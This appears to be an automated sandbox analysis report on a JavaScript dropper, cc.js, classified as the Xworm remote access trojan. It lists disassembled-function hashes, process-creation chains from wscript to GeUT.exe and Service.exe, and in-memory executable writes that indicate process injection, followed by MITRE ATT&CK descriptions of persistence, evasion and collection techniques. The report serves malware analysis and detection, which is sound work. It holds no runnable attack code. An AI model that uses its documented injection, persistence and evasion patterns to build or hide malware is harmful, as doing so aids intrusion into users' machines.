Instruction Fuzzy Hash: 5721BF78105286DFDB06FB28F9A4F553FA9FB85704B006A6CD504DB219DAB46F09DF80

Function 01220848 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2532953948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1220000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0f5a753fd79546e9699020e9287d1b5d66a08132b945ecc308d7e4c3be16c4b
Instruction ID: 6c6c77a2d08f92f31df1ab5943008e93c30b98ddd14a9fe9d29b408342c0b4e4
Opcode Fuzzy Hash: b0f5a753fd79546e9699020e9287d1b5d66a08132b945ecc308d7e4c3be16c4b
Instruction Fuzzy Hash: C8117778112247DFDB06FB28F998F557BA9F784704B00AA6C9504DB22DDBB46F099F80

Analysis Process: Service.exePID: 5144, Parent PID: 2940COMMON

Executed Functions

Function 01650D95 Relevance: .5, Instructions: 472COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2533082990.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1650000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fd5e4a6f5f8b3c133a61f3dbac5ab6a17f939c914e8999ca3fdd39621d9718d
Instruction ID: f918787f32ca91fe3591c3b981e05b2cfd90fb6f2483bb8bfa07f187c3a5e29a
Opcode Fuzzy Hash: 5fd5e4a6f5f8b3c133a61f3dbac5ab6a17f939c914e8999ca3fdd39621d9718d
Instruction Fuzzy Hash: 43515F707002028FDB5AEB79EC5C96E7FA2FBC9341700992CD5468B265EF78AD15CB80

Function 01651010 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2533082990.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1650000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c799affc8529412dc9e045d8ef735e88f365440f3cf3bf46e555595e8df63e6d
Instruction ID: 08f581cd60f59067e9f12ec1c5a6142140f5d37844779682235ede49beb63b45
Opcode Fuzzy Hash: c799affc8529412dc9e045d8ef735e88f365440f3cf3bf46e555595e8df63e6d
Instruction Fuzzy Hash: 3F917A347002028FDB55EB78EC58A6E7BB2FFC9240B10996DE546DB3A5DF74AC158B80

Function 01651157 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2533082990.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1650000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e942ff24133159be6138137afb5747c032ab8dac7df12f3d289269d096ef94b
Instruction ID: c103f3bd8b86e92bf3affa5718301793cf8a76dc3aad52a25303c7893758ae5e
Opcode Fuzzy Hash: 6e942ff24133159be6138137afb5747c032ab8dac7df12f3d289269d096ef94b
Instruction Fuzzy Hash: 0431A931B00B428BDB66AB798C1852E7AE6BFC5250300993DD6A78B784DF74EC008B81

Function 01651740 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2533082990.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1650000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d91ce2380c7bf3f6c720cd24909c21c3a09791b6fc4e60f96fca5a1d019902ab
Instruction ID: 9c0751467cf7edfe563689834e31ccd09cb91ede4430ba68b151f6fd94cee281
Opcode Fuzzy Hash: d91ce2380c7bf3f6c720cd24909c21c3a09791b6fc4e60f96fca5a1d019902ab
Instruction Fuzzy Hash: B9314C74A0020ADFDB45EBB8E858AADBFB2FFC5300F10456DE505A7351DB746A40CB55

Function 01651860 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2533082990.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1650000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb256bd0db1e8d13425f7e18c8db8ffdec4e46d1546e9ba3f8b72c07c075171c
Instruction ID: 26cd32846f0385050792287ee5366d7354199d8d9dded9129d2c68fb92869c9e
Opcode Fuzzy Hash: bb256bd0db1e8d13425f7e18c8db8ffdec4e46d1546e9ba3f8b72c07c075171c
Instruction Fuzzy Hash: 35218171B052069FDB44EBF9881876FBAEAFFC8350B14442ED64AD7355DE748C0187A1

Function 01651750 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2533082990.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1650000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5c6c4508ac0a15491a30a9ac8c50c8c91d41cd49bfc49ab2688cc5728484e28
Instruction ID: ec648d7706b1017544c69295af10bc253c275bee271dba8eaef161b56ec4c15c
Opcode Fuzzy Hash: c5c6c4508ac0a15491a30a9ac8c50c8c91d41cd49bfc49ab2688cc5728484e28
Instruction Fuzzy Hash: 5E212C74E0020ADFDB45EBB8E854AADBFB6FFC4300F104569D505A7341DB746A40CB55

Function 01650939 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2533082990.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1650000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f9aacddaf3dc0eb4c03b1ce28e26b7dc641d4b1ce98d02da5a46da8f544af8b
Instruction ID: 916b17b12af5c4e0cd5f9f85a9d3c47e37a11b02df8ee467e1e55a5d6e0f6002
Opcode Fuzzy Hash: 3f9aacddaf3dc0eb4c03b1ce28e26b7dc641d4b1ce98d02da5a46da8f544af8b
Instruction Fuzzy Hash: 57218C30A05205CFDB95EFB8D8556AE7BF1AF84300F1480A9D5059B296DB705D10CB91

Function 01650828 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2533082990.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1650000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34bd5a07b2e1d96ce2c94f0df2d609216629152ed92e1c4c70bbc5eeb9324d89
Instruction ID: c880f1f92e2c4b9b89512f8cf1964ab00dbfc40224e7c68982d79101cdcf930c
Opcode Fuzzy Hash: 34bd5a07b2e1d96ce2c94f0df2d609216629152ed92e1c4c70bbc5eeb9324d89
Instruction Fuzzy Hash: 6E212838301246CFCB16DB2CFC88985BFB5FBC5384700A699E5049B226DAB86D59CF91

Function 01650848 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2533082990.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1650000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15705f30726c9359c6e900f1b82090feaccbc7a3035290eb6307622c848d92d5
Instruction ID: c25d35d0bd46c57356a5de40426b20376be1c2da843f3a48875a49bfbb30b276
Opcode Fuzzy Hash: 15705f30726c9359c6e900f1b82090feaccbc7a3035290eb6307622c848d92d5
Instruction Fuzzy Hash: 1811A77830120ACFDB15DF2DF888A45BFB5FBC8784B10A69CE5049B215DABC6D498F91

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cc.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 790000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 390000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 500000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 370000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 770000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report cc.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GeUT.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Service.exe.log

C:\Users\user\AppData\Local\Temp\GeUT.exe

C:\Users\user\AppData\Local\Temp\Log.tmp

C:\Users\user\AppData\Roaming\Service.exe

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

UDP Packets

DNS Queries

DNS Answers

Statistics

Windows Analysis Report
cc.js

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
